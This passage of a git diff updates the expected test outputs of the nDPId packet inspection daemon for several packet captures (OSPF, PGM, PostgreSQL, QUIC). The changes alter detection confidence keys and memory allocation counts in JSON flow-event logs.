9stlVHB0y\/otPwbX9mpoJ+Dy1FXdgrsIv1LAkh1\/3bdSFFfKVJUwX6EGqQRQU02j\/r+E7RZ0bE01QtNNSuMRMdJX2zJtopXBwZLz8h67datSO+I1wfoRzj4VUG35Q8hcFywG\/xq04McVVySWGNnMos9RmQkhysf\/lc3FuHHnMMA\/XcGqeB2biYiiwAKDCGuBCGTLrEYhV1yIzE4vEhvJvg325fJl3DNeUSuAwqKe9SjUjQtv+EVpEiYxaR6X90zwFDBlHdBDDCfh3iS1o2jSGLUvocncy0jQz8qak7nPw6oMW\/gU8WvBhkEaY\/b26hw+tYWakl5yNVwxnF\/7PKfJyyyPpmjSH2ycL45nydbEY1t1GYpcV+P7AunIs6e
nuyUp9NNdtbH\/d0RuYFGsVW1287YLi13LwF56RtlC\/tVGquwfxdqcbniCbYb8LvlGF6r32UjuoiuACdgmkrt6Wf7sAVkRHeYLY5bLkD+o6H+JIwDjoOA\/yI8iOw0QceAwvS35vC2IO56LiInTgA=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1611427514609} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879726 bytes -~~ total memory freed........: 5879726 bytes -~~ total allocations/frees...: 118138/118138 +~~ total memory allocated....: 6013360 bytes +~~ total memory freed........: 6013360 bytes +~~ total allocations/frees...: 120900/120900 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2155 chars diff --git a/test/results/ospfv2_add_new_prefix.pcap.out b/test/results/ospfv2_add_new_prefix.pcap.out index a59322b4a..d6b63d574 100644 --- a/test/results/ospfv2_add_new_prefix.pcap.out +++ b/test/results/ospfv2_add_new_prefix.pcap.out 
@@ -2,9 +2,9 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1596626889276} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1596626889276,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1596626889276,"pkt":"qrvMAAEwqrvMAAowCABFwABsAPoAAAFZj3MKAQoKCgEKAQIEAFisEAAKAAAABqsnAAAAAAAAAAAAAAAAAAEAASIBrBAACqwQAAqAAAASxYoAPAAAAAMKAAAK\/\/\/\/\/wMAAAGsEAAK\/\/\/\/\/wMAAAEKAQoKCgEKCgIAAAo="} 
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"ndpi": {"confidence": {"4":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"ndpi": {"confidence": {"6":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1596626891781,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1596626891781,"pkt":"qrvMAAowqrvMAAEwCABFwABAAqkAAAFZjfAKAQoBCgEKCgIFACwKAAABAAAABjO3AAAAAAAAAAAAAAABIgGsEAAKrBAACoAAABLFigA8"} 
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1596626889276,"flow_last_seen":1596626891781,"flow_idle_time":620000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1596626891781,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1596626889276,"flow_last_seen":1596626891781,"flow_idle_time":620000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1596626891781,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":132,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1596626891781} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 
@@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 477 chars ~~ json string max len.......: 655 chars diff --git a/test/results/pgm.pcap.out b/test/results/pgm.pcap.out index bc03e6b9f..3e8038a1a 100644 --- a/test/results/pgm.pcap.out +++ b/test/results/pgm.pcap.out 
@@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1654564815455} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1654564815455,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1654564815455,"pkt":"AQBeAAEviFH7P19UCABFAAA4C7VAABRxIuMK9ECa6wABL9YlAHsAAEcBCvRAmtYlACQAAaJCAFHoKABR6ecAAQAACvRAmg=="} 
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"ndpi": {"confidence": {"4":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"ndpi": {"confidence": {"6":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1654564816295,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1654564816295,"pkt":"AQBeAAEviFH7P19UCABFAABzDnBAABRxH+0K9ECa6wABL9YlAHsEAAH0CvRAmtYlAF8AUenoAFHoKENTQQCABAAAbQAFAFBSSUNFAAAAAAAAAAAAAAAAAAAAAP\/\/AADXyjEBAQAAAAr0QJoAAAAANH8AAAAAAAABAAAAAQAAACoA"} 
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1654564816316,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1654564816316,"pkt":"AQBeAAEviFH7P19UCABFAABxDoBAABRxH98K9ECa6wABL9YlAHsEAE8tCvRAmtYlAF0AUenpAFHoKENTQQCABAAAbQADAExPRwAAAAAAAAAAAAAAAAAAAAD\/\/wAA18oxAQEAAAAK9ECaAAAAAEJ\/AAAAAAAAAQAAAAEAAAAqAA=="} -00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1000,"flow_first_seen":1654564815455,"flow_last_seen":1654564894361,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":162302,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1654564894361,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1000,"flow_first_seen":1654564815455,"flow_last_seen":1654564894361,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":162302,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1654564894361,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":1000,"total-skipped-flows":0,"total-l4-payload-len":162302,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1654564894361} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/1000 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5898415 bytes -~~ total memory freed........: 5898415 bytes -~~ total allocations/frees...: 119113/119113 +~~ total memory allocated....: 6032049 bytes +~~ total memory freed........: 6032049 bytes +~~ total allocations/frees...: 121875/121875 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 653 chars diff --git a/test/results/pgsql.pcap.out b/test/results/pgsql.pcap.out index 9ca754239..12b6f6602 100644 --- a/test/results/pgsql.pcap.out +++ b/test/results/pgsql.pcap.out 
@@ -8,10 +8,10 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":2103,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1103453998615} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 39/39 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875730 bytes -~~ total memory freed........: 5875730 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6009364 bytes +~~ total memory freed........: 6009364 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 685 chars diff --git a/test/results/pim.pcap.out b/test/results/pim.pcap.out index 8b7c0b222..40d6e1c37 100644 --- a/test/results/pim.pcap.out +++ b/test/results/pim.pcap.out 
